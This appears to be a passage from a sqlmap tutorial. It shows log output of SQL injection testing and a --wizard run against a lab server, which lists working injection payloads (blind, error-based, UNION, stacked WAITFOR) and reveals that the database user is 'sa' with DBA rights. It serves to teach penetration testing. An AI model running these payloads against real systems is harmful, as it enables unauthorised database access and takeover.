[xx:xx:14] [INFO] testing if GET parameter 'user' is dynamic

[xx:xx:14] [WARNING] GET parameter 'user' does not appear dynamic

[xx:xx:14] [WARNING] heuristic (basic) test shows that GET parameter 'user' might not be injectable

[xx:xx:14] [INFO] skipping GET parameter 'user'

[xx:xx:14] [INFO] testing if GET parameter 'id' is dynamic

[xx:xx:14] [INFO] confirming that GET parameter 'id' is dynamic

[xx:xx:14] [INFO] GET parameter 'id' is dynamic

[xx:xx:14] [WARNING] reflective value(s) found and filtering out

[xx:xx:14] [INFO] heuristic (basic) test shows that GET parameter 'id' might be injectable (possible DBMS: 'MySQL')

[xx:xx:14] [INFO] testing for SQL injection on GET parameter 'id'

heuristic (parsing) test showed that the back-end DBMS could be 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n] Y

do you want to include all tests for 'MySQL' extending provided level (1) and risk (1)? [Y/n] Y

[xx:xx:14] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'

[xx:xx:14] [INFO] GET parameter 'id' is 'AND boolean-based blind - WHERE or HAVING clause' injectable

[xx:xx:14] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause'

[xx:xx:14] [INFO] GET parameter 'id' is 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause' injectable

[xx:xx:14] [INFO] testing 'MySQL inline queries'

[xx:xx:14] [INFO] testing 'MySQL > 5.0.11 stacked queries'

[xx:xx:14] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query)'

[xx:xx:14] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'

[xx:xx:24] [INFO] GET parameter 'id' is 'MySQL > 5.0.11 AND time-based blind' injectable

[xx:xx:24] [INFO] testing 'MySQL UNION query (NULL) - 1 to 20 columns'

[xx:xx:24] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other potential injection technique found

[xx:xx:24] [INFO] ORDER BY technique seems to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test

[xx:xx:24] [INFO] target URL appears to have 3 columns in query

[xx:xx:24] [INFO] GET parameter 'id' is 'MySQL UNION query (NULL) - 1 to 20 columns' injectable

[...]

Wizard for beginners

Option: --wizard. An option aimed at beginners: it walks you step by step through entering what is needed to inject the target.

$ python sqlmap.py --wizard

sqlmap/1.0-dev-2defc30 - automatic SQL injection and database takeover tool

http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 11:25:26

Please enter full target URL (-u): http://192.168.21.129/sqlmap/mssql/iis/get_int.asp?id=1

POST data (--data) [Enter for None]:

Injection difficulty (--level/--risk). Please choose:

[1] Normal (default)

[2] Medium

[3] Hard

> 1

Enumeration (--banner/--current-user/etc). Please choose:

[1] Basic (default)

[2] Smart

[3] All

> 1

sqlmap is running, please wait..

heuristic (parsing) test showed that the back-end DBMS could be 'Microsoft SQL Server'. Do you want to skip test payloads specific for other DBMSes? [Y/n] Y

do you want to include all tests for 'Microsoft SQL Server' extending provided level (1) and risk (1)? [Y/n] Y

GET parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N

sqlmap identified the following injection points with a total of 25 HTTP(s) requests:

---

Place: GET

Parameter: id

Type: boolean-based blind

Title: AND boolean-based blind - WHERE or HAVING clause

Payload: id=1 AND 2986=2986

Type: error-based

Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause

Payload: id=1 AND 4847=CONVERT(INT,(CHAR(58) CHAR(118) CHAR(114) CHAR(100) CHAR(58) (SELECT (CASE WHEN (4847=4847) THEN CHAR(49) ELSE CHAR(48) END)) CHAR(58) CHAR(111) CHAR(109) CHAR(113) CHAR(58)))

Type: UNION query

Title: Generic UNION query (NULL) - 3 columns

Payload: id=1 UNION ALL SELECT NULL,NULL,CHAR(58) CHAR(118) CHAR(114) CHAR(100) CHAR(58) CHAR(70) CHAR(79) CHAR(118) CHAR(106) CHAR(87) CHAR(101) CHAR(119) CHAR(115) CHAR(114) CHAR(77) CHAR(58) CHAR(111) CHAR(109) CHAR(113) CHAR(58)--

Type: stacked queries

Title: Microsoft SQL Server/Sybase stacked queries

Payload: id=1; WAITFOR DELAY '0:0:5'--

Type: AND/OR time-based blind

Title: Microsoft SQL Server/Sybase time-based blind

Payload: id=1 WAITFOR DELAY '0:0:5'--

Type: inline query

Title: Microsoft SQL Server/Sybase inline queries

Payload: id=(SELECT CHAR(58) CHAR(118) CHAR(114) CHAR(100) CHAR(58) (SELECT (CASE WHEN (6382=6382) THEN CHAR(49) ELSE CHAR(48) END)) CHAR(58) CHAR(111) CHAR(109) CHAR(113) CHAR(58))

---

web server operating system: Windows XP

web application technology: ASP, Microsoft IIS 5.1

back-end DBMS operating system: Windows XP Service Pack 2

back-end DBMS: Microsoft SQL Server 2005

banner:

---

Microsoft SQL Server 2005 - 9.00.1399.06 (Intel X86)

Oct 14 2005 00:33:37

Copyright (c) 1988-2005 Microsoft Corporation

Express Edition on Windows NT 5.1 (Build 2600: Service Pack 2)

---

current user:    'sa'

current database:    'testdb'

current user is DBA:    True

[*] shutting down at 11:25:52

杞浇鑷細http://drops.wooyun.org/tips/143
